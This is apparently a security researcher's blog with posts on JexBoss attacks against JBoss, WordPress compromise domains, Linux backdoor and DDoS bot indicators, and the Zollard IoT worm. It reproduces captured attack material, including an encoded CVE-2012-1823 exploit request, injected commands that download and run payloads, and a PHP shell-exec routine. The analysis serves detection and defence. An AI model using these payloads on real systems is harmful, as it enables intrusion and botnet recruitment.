Tuesday, April 12, 2016

JBoss exploits - View from a Victim


JBOSS

Over the past few months, the distribution vector for "Ransomware" has shifted to a more targeted approach.

Several hospitals and healthcare organizations recently found themselves the victim of a widespread Ransomware infection.
Exploits against JBoss are believed to be responsible for several of these incidents, where a compromised JBoss server allowed access to the hospital's internal network.

For an excellent writeup of Ransomware infections using the JBoss exploits, see the Cisco Talos blog: "SamSam: The Doctor Will See You, After He Pays the Ransom"
Note that "JexBoss" is described as the exploit tool of choice.  JexBoss exploits very old vulnerabilities in JBoss, and takes advantage of poor upgrading or patching policies.

Via Shodan or Google 'dorking', one can determine that there are a great deal of JBoss deployments.  
It can be safe to assume that many of these deployments likely remain vulnerable.
While healthcare and hospitals are the target 'du jour', other high profile industry segments running old JBoss, may be targeted next.

In an effort to raise awareness to the JexBoss exploit and what it looks like from the victim's point of view, we stood up two vulnerable JBoss servers and exploited them using JexBoss.
We're providing some screen shots of JexBoss in action, along with the network packet captures from the vantage of the victim.  We also will provide a list of the Snort and Emerging Threat IDS signatures that currently alert on this traffic.

Our test environment consisted of two Amazon EC2 instances running RedHat linux.  I configured the first instance to run JBoss v6, and the other to run JBoss v4.
Please don't bother to test or "attack" the EC2 instances I used.  They are firewalled to the world, except to my IP :)
The attacking environment was a simple Debian linux VM with JexBoss installed.

Attacking JBoss 4

Running JexBoss against a vulnerable host is quite trivial.  You simply provide the URL of the JBoss instance, and hit Enter.
The following image shows how JexBoss found the JBoss web-console, jmx-console and JMXInvokerServlet as being vulnerable.

JexBoss attack against a JBoss v4 host

In this example, I ran the exploit against jmx-console.  I then ran the linux 'ls' command to display the files on the compromised host.
Saying "Yes" to automated exploitation of jmx-console will instruct the victim server to pull a remote exploit toolkit named "jbossass.war" from 'joaomatosf.com'.

Victim server fetching remote exploit toolkit


Once the exploit code is deployed, a command shell is launched and a few host identification commands are automatically run.
Subsequent runs of JexBoss will not fetch the toolkit if it is already present on the victim host.

In this next example, I ran the exploit against the JBoss web-console.
Once the toolkit is resident on the JBoss instance via the JexBoss exploit, you can use the compromised host to fetch more files of your choice.  Note how I used the 'curl' command to fetch a remote text file and display it on the console.


Using JexBoss to fetch a remote file via the compromised host.

In this example, I fetched the same file and saved it to the compromised host.  Running the linux 'ls' command after the fetch reveals the file is now resident on the JBoss host.

Using JexBoss to fetch and save a remote file to the compromised host.

Here is a look at a log segment from the victim host after the exploits were run.  A few exceptions are thrown, and Warnings and Info are logged.


Log file segment showing Warnings and Info after JexBoss exploit

Attacking JBoss v6

Attacking JBoss v6 is quite similar, except the web-console is not vulnerable, and exploiting the JMXInvokerServlet can be hit or miss.
However, the jmx-console is as easily exploited as it was in JBoss version 4.

JexBoss exploit against the jmx-console on a JBoss v6 host


JexBoss exploit against the jmx-console on a JBoss v6 host - Remote file fetch

Summary:

By virtue of this very simple exploit tool, it's quite apparent that old versions of JBoss are extremely vulnerable to full attacker control.
With the continually evolving news of organizations falling victim to ransomware via JBoss exploits, it of critical urgency that any JBoss instance be checked and patched.
I actually wonder how many organizations are even aware that they are running JBoss, let alone a vulnerable instance of it.

A breakdown of the security vulnerabilities in JBoss, the versions affected, and the pertinent dates, can be found at CVEDetails - JBoss
We wanted this post to provide a glimpse of a JBoss exploit from the vantage of the victim.  We hope that this blog post helps raise further awareness to this serious threat, and provides some additional information to help detect and defend against these attacks.

Files and Additional Information:

IDS Signatures:

The following Snort and Emerging Threat IDS signatures will detect these JexBoss probes and exploits

[1:2014017:1] ET WEB_SERVER JBoss jmx-console Probe

[1:2801445:3] ETPRO EXPLOIT RedHat JBoss Enterprise Application Platform JMX Console Authentication Bypass

[1:24642:4] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX code execution attempt

[1:18794:9] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX authentication bypass attempt

[1:21516:9] SERVER-WEBAPP JBoss JMX console access attempt

[1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view source attempt

Packet Captures

JexBoss attack traffic - Vantage of a JBoss version 6 host:  

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote toolkit fetch):

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and display):

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and save to victim host):


Friday, February 12, 2016

Jan-Feb 2016 domains associated with "Admedia" Wordpress compromises (WP plugins)

We've been seeing a fair number of compromised Wordpress sites with various javascript plugins that are redirecting visitors to assorted malicious domains.

Sucuri discussed this in an excellent post: "Massive Admedia/Advertising iFrame Injection"

Since then, we've seen the URI construct of the redirection change from "/admedia/?" to "/megaadvertize/?keyword="

Currently the most popular redirect URLs appear to be:
http://vrot.stervapoimeniliana[.]info/megaadvertize/?keyword=<>
http://pon.krasnayadama[.]info/megaadvertize/?keyword=<>

All the redirect domains we've seen use the following as nameservers

  • gotl549293.mars.orderbox-dns[.]com
  • gotl549293.earth.orderbox-dns[.]com
  • gotl549293.venus.orderbox-dns[.]com
  • gotl549293.mercury.orderbox-dns[.]com

So to get an idea of what other domains might be used for this campaign, we looked at two things:
* Which domains are using these nameservers?
* Which domains have the email address "valera.valera-146.yandex.ru" in the DNS SOA records.?

Below is a list of the domains meeting this criteria:


barabawka.net
london88.pw
barada222.pw
suchka46.pw
easy-trading.biz
balw5ezvicz7hka.pw
balw5ezvicz7hka.pw
goroda235.pw
trymyfinger.website
trymyfinger.website
borodavka.website
zaleimneviskivgorlo.website
bababolka.website
daitepospatirodu.website
poprobyimoihyi.website
suchkakrawenaya.website
lovelyclub.biz
lovelygames.biz
tapochekmiwu.website
tapochekkati.website
tapochekmiwu.website
suchtozahyinya.com
golayagopa.website
goluivovka.website
goluivalerka.website
golayapipetka.website
golayazadnica.website
suchtozahyinya.com
batyaebetvseh.website
matyaebetvseh.website
rozovuiurka.website
rozovuimiwka.website
rozovuisawka.website
rozovuivasunya.website
mainlandpage.website
siniuurka.website
siniukolka.website
siniusawka.website
zaleimneviskivgorlo.website
chernuioleg.website
chernuikolya.website
chernuipetya.website
chernuisanya.website
kolhoznik.website
malenkiyprince.website
zaleimneviskivgorlo.website
beluidanya.website
beluilanya.website
beluisanya.website
beluitanya.website
beluivanya.website
beluidanya.website
seruidebil.website
seruisanya.website
seruitanya.website
seruidyatel.website
seruidolboeb.website
mainlandpage.website
zelenuiranya.website
zelenuisanya.website
zelenuitanya.website
zelenuivanya.website
meetclub.biz
borodatayagenwina.website
borodatuiloh.website
borodatuiotec.website
borodatuimyguk.website
borodayasobaka.website
easy-trading.biz
zo1lotayawlyapa.website
zol1otayawlyapa.website
zolo1tayawlyapa.website
zolot1ayawlyapa.website
zolota1yawlyapa.website
zolotay1awlyapa.website
zolotaya1wlyapa.website
zolotayaw1lyapa.website
zolotayawl1yapa.website
zolotayawly1apa.website
getallcooltraffic.com
trymysocks1.ws
trymysocks2.ws
trymysocks4.ws
trymysocks5.ws
forexmyways.com
gameforgods.com
ilovetradingz.com
nicefilmwatchs.com
realylovegames.com
surveyforyourss.com
watchlovedfilms.com
fastestmonkeymakes.com
moneyforfriends.net
pl1atiebeloe.ws
platie1beloe.ws
platieb1eloe.ws
getallcooltraffic.com
lovelygames.biz
nicefilmwatchs.com
watchlovedfilms.com
surveyforyourss.com
1n-dobloebu.ws
1n-dobloebu1.ws
1n-dobloebu2.ws
1n-dobloebu3.ws
gamingguidess.com
landpagegames.com
localpagegengames.com
moneyforfriends.net
zzzsleepy.ws
zzzsleepy1.ws
zzzsleepy2.ws
realylovegames.com
fastestmonkeymakes.com
zzzmaluw3.ws
zzzmaluw4.ws
gameforgods.com
ownfavoritesite.com
dearcustomersgogo.com
listenquicklypage.com
gameforgods.com
ilovetradingz.com
polnuewtaniwki.ws
p3olnuew3taniwki.ws
poln1uewt1aniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
polnuewtaniwki.ws
dearcustomersgogo.com
trackersystemsz.biz
barkdenboms.com
crazydomainfoq.com
p3olnuew3taniwki.ws
poln1uewt1aniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
dydochka12345.ws
lydochka12345.ws
vodochka12345.ws
mordochka12345.ws
collectinfoitemsz.com
findyourwaytotr.net
samplefasttrack.org
getmylovelyyy.com
dearcustomersgogo.com
polnuewtaniwki.ws
barkdenboms.com
listenquicklypage.com
trackersystemsz.biz
findyourwaytotr.net
goingfortraff.com
trackingzystem.com
findtrafficcount.com
p3olnuew3taniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
poln1uewt1aniwki.ws
barkdenboms.com
crazydomainfoq.com
fabosik12345.ws
nifnafbet.biz
nifnafbet.com
nifnafbet.net
nifnafbet.org
baltimoreprivet.biz
baltimoreprivet.org
baltimoreprivet.com
baltimoreprivet.net
dedulkasanya.biz
malenkiuniger.biz
oduvanchiksawa.biz
dedulkasanya.com
oduvanchiksawa.com
dedulkasanya.net
oduvanchiksawa.net
dedulkasanya.org
oduvanchiksawa.org
malenkiuniger.info
malenkiuniger.com
malenkiuniger.net
malenkiuniger.org
chrenovuihren.biz
chrenovuihren.com
bolwayazalypencuya.com
chrenovuihren.net
bolwayazalypencuya.net
chrenovuihren.org
bolwayazalypencuya.org
chrenovuihren.biz
babulkadayn.in.net
babulkasyka.in.net
forbetterget.in.net
babulkamaksim.in.net
bravayasuchka.in.net
nravayasuchka.in.net
pravayasuchka.in.net
wravayasuchka.in.net
poprobyipoprawaika.in.net
bravayasuchka.in.net
nravayasuchka.in.net
pravayasuchka.in.net
wravayasuchka.in.net
thatsbigidea.info
crazyfastestway.info
belayadama.info
serayadama.info
chernayadama.info
krasnayadama.info
stervapoimeniolya.info
stervapoimenialena.info
stervapoimenialina.info
stervapoimeniliana.info



Nearly all domain names are transliterated Russian word combinations.
Some of the domains registered by valera.valera-146@yandex.ru such as barabolka[.]com bear the Registrant Name: Valeriy Babosuch. - http://www.whoismind.com/whois/barabolka.com.html

This name is associated with other domains listed below and registrant email address mindupper@gmail.com .

Domains registered by mindupper@gmail.com were made of mostly English language word combinations.

Some of the domains associated with Nuclear EK and Pony/Fareit post infection were hosted on 162.247.12.207.  See more at:
http://malwaredb.malekal.com/url.php?netname=WFC
http://malwarefor.me/2015-04-26-nuclear-ek-dropping-ponyfareit/

162.247.12.207
https://www.virustotal.com/en/ip-address/162.247.12.207/information/
Country CA - Autonomous System6939 (Hurricane Electric, Inc . )

Phishing (such as https://whois.domaintools.com/blondescript.net) was seen on 91.200.85.137



Passive DNS results for these two IP addresses reveal the domains. VirusTotal results show:

3/66 2016-01-10 15:49:37 http://givemeaudi . com/
4/66 2015-12-13 15:31:51 http://sampletds . net/
4/66 2015-11-25 09:25:32 http://yellowfrance . info/
2/67 2015-11-22 04:21:10 http://sampletds . org/
1/66 2015-11-20 10:51:43 http://yellowfrance . com/
3/63 2015-07-19 14:33:43 http://sampletds . info/
6/63 2015-06-08 01:03:04 http://www . yellowfrance . info/
4/63 2015-05-19 09:43:33 http://yellowfrance . com/wRJrUHURtdt20 . html
3/63 2015-04-30 15:37:56 http://yellowfrance . com/HelVGnsIlBR20 . html
3/62 2015-04-21 14:30:13 http://yellowfrance . com/falJTWHvsFU20 . html
6/62 2015-04-21 13:35:51 http://yellowfrance . info/qYCrsJuHWhE20 . html
3/62 2015-04-17 10:49:08 http://yellowfrance . com/sHrWgPcxdvy20 . html
6/62 2015-04-16 02:21:39 http://yellowfrance . info/woMbVHaDOfk20 . html
6/62 2015-04-15 19:46:12 http://yellowfrance . info/HXndqXghAHy20 . html
6/62 2015-04-15 19:45:57 http://yellowfrance . info/ppmerkzbRUk20 . html
2/62 2015-04-15 18:57:31 http://givemeaudi . com/ZlqkpeqDQoy20 . html
6/62 2015-04-15 18:33:34 http://yellowfrance . info/JYndncMIRlu20 . html
6/62 2015-04-15 14:31:15 http://yellowfrance . info/vTGmbyYZBGB20 . html
6/62 2015-04-13 14:23:58 http://yellowfrance . info/YRgyxhPwalE20 . html
1/62 2015-04-09 19:58:58 http://givemeaudi . com/jWRihuJevxB20 . html
6/62 2015-04-09 15:12:33 http://yellowfrance . info/LqLEqeicSXT20 . html
6/62 2015-04-09 15:12:15 http://yellowfrance . info/RhFaRmFvnhE20 . html
3/62 2015-04-09 02:35:13 http://yellowfrance . info/qXgxBLvENoH20 . html
4/62 2015-04-08 11:49:18 http://yellowfrance . info/LEZrGknOuaD20 . html
3/62 2015-04-07 18:33:32 http://yellowfrance . info/BaKYxblgbHt20 . html
3/62 2015-04-07 10:44:09 http://yellowfrance . info/gUoyLbRBcJw20 . html
3/62 2015-04-06 18:55:57 http://yellowfrance . info/AomQXriDFBd20 . html
3/62 2015-04-06 05:21:23 http://yellowfrance . info/rIoeSAnGUuf20 . html
3/62 2015-04-03 20:32:58 http://yellowfrance . info/wpwssjkpevc20 . html
3/62 2015-04-02 14:30:25 http://yellowfrance . info/cLFHmTVqCEW20 . html
3/62 2015-04-02 13:11:26 http://yellowfrance . info/KyLpyRWHMUb20 . html
2/62 2015-04-01 12:08:35 http://yellowfrance . info/GNuCrxcJYcP20 . html
2/62 2015-04-01 10:06:37 http://yellowfrance . info/lvNbgtiyxOu20 . html
1/62 2015-04-01 01:53:08 http://yellowfrance . info/inDOFfbujAt20 . html
1/62 2015-04-01 00:23:39 http://yellowfrance . info/vvBdLhNoChB20 . html
1/62 2015-03-31 23:59:50 http://yellowfrance . info/pAJQxOsQxXP20 . html
1/62 2015-03-17 02:16:12 http://sampletds . org/cevch18 . html
1/62 2015-03-16 19:42:09 http://sampletds . org/ANcXoDpCldL20 . html
1/62 2015-03-12 17:48:28 http://sampletds . info/in . cgi?
1/62 2015-03-12 15:47:25 http://sampletds . net/in . cgi?20&CS=1
1/62 2015-03-12 13:48:35 http://sampletds . net/in . cgi?20&CS=1
1/62 2015-03-12 13:43:03 http://sampletds . net/SfzYoUZLuDw20 . html
2/52 2014-05-23 14:11:51 http://theviagrapills . com/?1


Registrant Name: Valeriy Babosuch
Registrant Organization: 
Registrant Street: Truhanovskaya 45
Registrant City: Moscow
Registrant State/Province: N/A
Registrant Postal Code: 121497
Registrant Country: RU
Registrant Phone: +7 . 9453466645
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: mindupper@gmail.com


Compromises in CMS, including Wordpress, Joomla!, and Drupal remain a significant threat. Detecting the malicious redirect via the URI construct is useful.  However this is often changed quickly by the attacker.  Hopefully to improve awareness and detection, we wanted to provide this list of domains that may be related to this active Wordpress compromise.

Monday, February 9, 2015

Linux.BackDoor.XNote.1 indicators

We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.
Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: http://blog.malwaremustdie.org/

Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote', that opens a backdoor on the compromised host.  The host is then used for a variety of functions, including as a DDoS bot.
The DrWeb posts provide a very good analysis of the malware and its overall structure.
http://news.drweb.com/show/?i=9272&lng=en&c=5
http://vms.drweb.com/virus/?i=4323517

We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.
The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.

Upon execution, we noted the sample contact a DNS server on 114.114.114.114 with queries for the following domains:

  • a.et2046.com
  • b.et2046.com
  • c.et2046.com
For each query, IP address 122.10.85.54 was returned for each of them.

In our run, the malicious 'xnote' process was noted to have process ID of 1303. Using 'volatility' to map information about the process memory, we noted:
Volatility Foundation Volatility Framework 2.4
Pid  Start      End        Flags Pgoff    Major Minor Inode  Path              
1303   0xc01000   0xc02000 r-x        0x0     8     1 405848 /home/mattyh/xnote
1303  0x8048000  0x81ba000 r-x        0x0     0     0      0                   
1303  0x81ba000  0x81c4000 rwx        0x0     0     0      0                   
1303  0xa137000  0xa158000 rwx        0x0     0     0      0 [heap]            
1303 0xb78b6000 0xb78b7000 r-x        0x0     0     0      0 [vdso]            
1303 0xbf843000 0xbf859000 rwx        0x0     0     0      0 [stack]

Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.

XXXXXXXXXXXXXXXX122.10.85.54
a.et2046.com
b.et2046.com
c.et2046.com
e.et2046.com
test
CAk[S
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
.,-+xX0123456789abcdef0123456789ABCDEF-+xX0123456789abcdefABCDEF
-0123456789

-0123456789


Domain and IP Information:

It is interesting to note that the domain "et2046.com" has been seen before in other Linux ELF malware.
  • Note this post to an Ubuntu forum from May, 2014 where the subdomains 'kill.et2046.com' and 'sb.et2046.com' were noted in a running process on a compromised Ubuntu host.
  • Malware Must Die posted an analysis of the Linux iptablex malware where these domains were also seen:
  • Via VirusTotal searches, we find related malware to these domains:


Obtaining Passive DNS information from FarSight Security's DNSDB, we see that currently for IP address 122.10.85.54 the only DNS records are:

www.qtol.tv. A 122.10.85.54

Additional information from DNSDB for the domain et2046.com:

count 54
first seen in zone file 2014-11-12 17:13:42 -0000
last seen in zone file 2015-01-13 17:23:33 -0000
et2046.com. NS a.dnspod.com.
et2046.com. NS b.dnspod.com.
et2046.com. NS c.dnspod.com.


count 329
first seen in zone file 2013-12-17 17:13:33 -0000
last seen in zone file 2014-11-11 17:12:29 -0000
et2046.com. NS ns155.dnsever.com.
et2046.com. NS ns165.dnsever.com.
et2046.com. NS ns179.dnsever.com

Note that the malware uses a hardcoded DNS server on 114.114.114.114 to provide all domain resolution.   This is a public DNS server based in China, with its web page at www.114dns.com



whois - 114.114.114.114

inetnum:        114.114.0.0 - 114.114.255.255
netname:        XFInfo
descr:          NanJing XinFeng Information Technologies, Inc.
descr:          Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road
descr:          Xuanwu District, Nanjing, Jiangsu, China
country:        CN
irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn

person:         Yan Jian
nic-hdl:        YJ1777-AP
e-mail:         jyan@greatbit.com

person:         Zhao Zhenping
nic-hdl:        ZZ2094-AP
e-mail:         ping@greatbit.com

whois- 122.10.85.54

inetnum:        122.10.80.0 - 122.10.95.255
netname:        TOINTER-CN
descr:          Royal Network Technology Co., Ltd. in Guangzhou
country:        HK
admin-c:        WX2631-AP
tech-c:         WX2631-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CN-TOINTER122
mnt-irt:        IRT-TOINTER-CN
changed:        tengdayx@gmail.com 20150112
source:         APNIC

irt:            IRT-TOINTER-CN
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360
e-mail:         abuse@gzroyal.cn
abuse-mailbox:  abuse@gzroyal.cn
admin-c:        RNTC1-AP
tech-c:         RNTC1-AP
auth:           # Filtered
mnt-by:         MAINT-TOINTER-CN
changed:        hm-changed@apnic.net 20140919
source:         APNIC

person:         Wei XeiJun
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533
country:        CN
phone:          +86.1234567890
e-mail:         tengdayx@qq.com
nic-hdl:        WX2631-AP
mnt-by:         MAINT-TOINTER-CN
changed:        tengdayx@qq.com 20150111


'whois' for Domain et2046.com

Domain Name: ET2046.COM
Registry Domain ID: 1762221508_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-08-25T06:58:17Z
Creation Date: 2012-11-27T14:02:55Z
Registrar Registration Expiration Date: 2016-11-27T14:02:55Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.480-624-2505

Registry Registrant ID: 
Registrant Name: smaina smaina
Registrant Organization: 
Registrant Street: Beijing
Registrant City: Beijing
Registrant State/Province: Beijing
Registrant Postal Code: 100080
Registrant Country: China
Registrant Phone: +86.18622222222
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: tuhao550@gmail.com


-----------------------------------------------------------------------------------------------------------------------
(Uses same password scheme as Contagio.  Ping me or Mila for details if needed)

Thursday, February 5, 2015

Library of Malware Traffic Patterns


Update February 2015 
Use the new link below for a new interface and updates.

Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize  malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.

Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

 List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)


Tuesday, July 8, 2014

Another Linux DDoS bot via CVE-2012-1823

If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823.  Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string.  Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot.  

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS.  While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up.  We like to study and track these variants and infrastructures, as well as the payloads that are being injected.  In this case, one particular payload caught our eye.

In this case, the exploit attempt had URL encoding of:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: -h

When decoded, the actual URL is :

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed"

#!/bin/bash
cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2".  This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team".  A copy of this popular IRCBot can be found at this PasteBin link.

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
$server = 'antiq.scifi.ro'
$server = 'antiq.evils.in'
my @admins = ("AnTiQ","deathy","Vasy");
my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
my @channels = ("#vnc");

The "seed' script also instructed our server to download "stats.php".  This was also a tar file, which when expanded, created a hidden directory named ".d" which contained the following files:

Contents of hidden 'd' subdirectory
The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory


Section of "Slashing SirVic's"flooding source code.

Two other files included in the "stats.php" tarball were of particular interest.  They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports.  At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania.  "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims.  We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

Soon after the script downloads, our server joined the IRC on antiq.scifi.ro (195.182.159.51)

Bot joining C2 on antiq.scifi.ro
Not long after that, a command initiating a flood attack against 70.39.96.225 begins, and the compromised host begins sending fragmented UDP packets to the victim.


Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood
We've observed this botnet as being very active, targeting a wide variety of victims.   While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS, weak SSH passwords, as well as vulnerable PHP deployments remain a major weakspot in Internet facing servers.  It's pretty safe to say that if web site administrators do not perform a regular, stringent patch management program, it's just a matter of 'when', not 'if' they will be compromised.



Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent: Zollard and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.

All files were fetched, and the x86 file was sandboxed on a linux VM.  Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455.  The linux malware also opened up a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445.  Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"
Weak or non-existent passwords allow for a successful telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
